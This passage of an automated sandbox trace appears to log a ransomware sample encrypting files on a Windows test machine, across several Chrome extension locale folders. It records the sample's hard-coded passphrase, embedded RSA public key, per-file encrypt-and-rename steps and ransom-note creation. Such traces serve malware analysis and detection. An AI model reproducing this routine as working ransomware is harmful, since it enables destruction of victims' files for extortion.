lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.753] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.753] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0250.753] GetLastError () returned 0x0 [0250.754] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json")) returned 0x20 [0250.754] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json", dwFileAttributes=0x80) returned 1 [0250.754] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0250.754] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0250.756] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0250.756] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2989270) returned 1 [0250.758] CryptCreateHash (in: hProv=0x2989270, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0250.758] lstrlenA (lpString="YpinUbJDdIEgxfEoLIcGdepQzMlQm") returned 29 [0250.758] CryptHashData (hHash=0x2985a60, pbData=0x28cb418, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0250.758] CryptDeriveKey (in: hProv=0x2989270, Algid=0x6610, hBaseData=0x2985a60, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2985aa0) returned 1 [0250.759] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----h", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0250.759] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0250.759] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2988280) returned 1 [0250.759] CryptImportPublicKeyInfo (in: hCryptProv=0x2988280, dwCertEncodingType=0x1, pInfo=0x2992500*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2992530*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2992538*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2985ae0) returned 1 [0250.759] CryptEncrypt (in: hKey=0x2985ae0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0250.759] CryptEncrypt (in: hKey=0x2985ae0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x29886c0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x29886c0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0250.759] WriteFile (in: hFile=0x5d58, lpBuffer=0x29886c0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x29886c0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0250.761] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x10c, lpOverlapped=0x0) returned 1 [0250.762] CryptEncrypt (in: hKey=0x2985aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x10c, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x110) returned 1 [0250.762] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x110, lpOverlapped=0x0) returned 1 [0250.762] CloseHandle (hObject=0x5d5c) returned 1 [0250.762] CloseHandle (hObject=0x5d58) returned 1 [0250.762] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json"), bFailIfExists=0) returned 1 [0250.766] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json", dwFileAttributes=0x0) returned 1 [0250.766] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json.gsg")) returned 1 [0250.767] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json.fuck")) returned 1 [0250.768] CryptDestroyHash (hHash=0x2985a60) returned 1 [0250.768] CryptDestroyKey (hKey=0x2985aa0) returned 1 [0250.768] CryptReleaseContext (hProv=0x2989270, dwFlags=0x0) returned 1 [0250.768] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0250.768] FindClose (in: hFindFile=0x2985a20 | out: hFindFile=0x2985a20) returned 1 [0250.768] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\readme_back_files.htm")) returned 0xffffffff [0250.769] AreFileApisANSI () returned 1 [0250.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 154 [0250.769] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0250.769] GetFileType (hFile=0x5d54) returned 0x1 [0250.769] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0250.770] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0250.770] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985a20 [0250.771] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.771] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.771] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0250.771] GetLastError () returned 0x0 [0250.771] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json")) returned 0x20 [0250.771] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json", dwFileAttributes=0x80) returned 1 [0250.772] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0250.772] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0250.773] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0250.773] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2989270) returned 1 [0250.775] CryptCreateHash (in: hProv=0x2989270, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0250.775] lstrlenA (lpString="YpinUbJDdIEgxfEoLIcGdepQzMlQm") returned 29 [0250.775] CryptHashData (hHash=0x2985ea0, pbData=0x28cb6e8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0250.775] CryptDeriveKey (in: hProv=0x2989270, Algid=0x6610, hBaseData=0x2985ea0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2985f20) returned 1 [0250.775] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----h", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0250.775] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0250.775] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2988390) returned 1 [0250.776] CryptImportPublicKeyInfo (in: hCryptProv=0x2988390, dwCertEncodingType=0x1, pInfo=0x2991660*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2991690*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2991698*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2985a60) returned 1 [0250.776] CryptEncrypt (in: hKey=0x2985a60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0250.776] CryptEncrypt (in: hKey=0x2985a60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2988858*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2988858*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0250.776] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2988858*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2988858*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0250.777] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x11f, lpOverlapped=0x0) returned 1 [0250.779] CryptEncrypt (in: hKey=0x2985f20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x11f, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x120) returned 1 [0250.779] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x120, lpOverlapped=0x0) returned 1 [0250.779] CloseHandle (hObject=0x5d58) returned 1 [0250.779] CloseHandle (hObject=0x5d5c) returned 1 [0250.779] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json"), bFailIfExists=0) returned 1 [0250.783] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json", dwFileAttributes=0x0) returned 1 [0250.783] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json.gsg")) returned 1 [0250.784] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json.fuck")) returned 1 [0250.785] CryptDestroyHash (hHash=0x2985ea0) returned 1 [0250.785] CryptDestroyKey (hKey=0x2985f20) returned 1 [0250.785] CryptReleaseContext (hProv=0x2989270, dwFlags=0x0) returned 1 [0250.785] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0250.785] FindClose (in: hFindFile=0x2985a20 | out: hFindFile=0x2985a20) returned 1 [0250.785] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\readme_back_files.htm")) returned 0xffffffff [0250.785] AreFileApisANSI () returned 1 [0250.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 154 [0250.785] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0250.786] GetFileType (hFile=0x5d54) returned 0x1 [0250.786] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0250.787] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0250.787] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985ba0 [0250.787] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.787] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.787] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0250.787] GetLastError () returned 0x0 [0250.787] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json")) returned 0x20 [0250.788] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json", dwFileAttributes=0x80) returned 1 [0250.788] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0250.788] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0250.790] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0250.791] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2989270) returned 1 [0250.793] CryptCreateHash (in: hProv=0x2989270, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0250.793] lstrlenA (lpString="YpinUbJDdIEgxfEoLIcGdepQzMlQm") returned 29 [0250.794] CryptHashData (hHash=0x2985a20, pbData=0x28cb6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0250.794] CryptDeriveKey (in: hProv=0x2989270, Algid=0x6610, hBaseData=0x2985a20, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2985ea0) returned 1 [0250.794] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----h", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0250.794] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0250.794] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 